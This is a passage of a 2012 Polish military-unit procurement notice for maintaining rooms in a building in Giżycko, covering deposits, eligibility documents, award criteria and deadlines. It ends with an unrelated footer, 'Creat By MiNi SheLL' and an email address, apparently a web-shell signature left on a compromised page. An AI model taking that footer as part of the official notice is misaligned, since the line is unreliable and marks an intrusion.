2)poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo-Kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.). 
D.Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego  prowadzony przez:  NBP O/O Olsztyn  85 1010 1397 0020 1713 9120 0000 z dopiskiem wadium - konserwacja pomieszczeń II i III piętra w budynku nr  3 JW. 4352 w Giżycku ul. Nowowiejska 20.
E.Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. 
Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego 
z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę - za zgodność z oryginałem.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie na podstawie art. 44 ustawy p.z.p (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłacona polisa lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (suma ubezpieczenia nie niższa niż 100 000,00 zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. FORMULARZ OFERTOWY ­ wypełniony i podpisany wg wzoru Zamawiającego (załącznik nr 1 do SIWZ ).
2. KOSZTORYS OFERTOWY - sporządzony na podstawie:
-specyfikacji techniczna wykonania i odbioru robót (załącznik nr 7 do SIWZ),  
-założeń wyjściowych do kosztorysowania ( załącznik nr 8 do SIWZ),
-przedmiaru robót ( załącznik nr 9 do SIWZ),
-szkiców i rysunków ( załącznik nr 10 do SIWZ).
3. PARAFOWANY WZÓR UMOWY - parafka na każdej stronie (załącznik nr 5 do SIWZ ).
4. ZESTAWIENIE POZYCJI PRZEDMIAROWYCH Z CENAMI JEDNOSTKOWYMI  - wg wzoru Zamawiającego (załącznik nr 2 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega możliwość zmiany wysokości zobowiązania wynikającego z oferty Wykonawcy, z którym zawrze umowę na wykonanie robót budowlanych w zakresie konserwacji pomieszczeń II i III piętra w budynku nr  3 JW. 4352 w Giżycku ul. Nowowiejska 20 w wyniku niniejszego postępowania w przypadku zmiany stawki podatku od towarów i usług w 2012r. w formie aneksu.
2. Zamawiający dopuszcza zmianę terminu zakończenia robót w przypadku:
a)Wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego,
b)Klęsk żywiołowych uniemożliwiających realizację przedmioty zamówienia,
c)Wstrzymanie robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl, http://www.army.mil.pl, http://www. 24wog.wp.mil.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 4352 W GIŻYCKU
ul. Nowowiejska 20, 
11-500 GIŻYCKO
(Budynek sztabu,  pok. nr 7),.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2012 godzina 10:00, miejsce: JEDNOSTKA WOJSKOWA 4352 W GIŻYCKU
ul. Nowowiejska 20, 
11-500 GIŻYCKO
Kancelaria Jawna (pok. 109).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com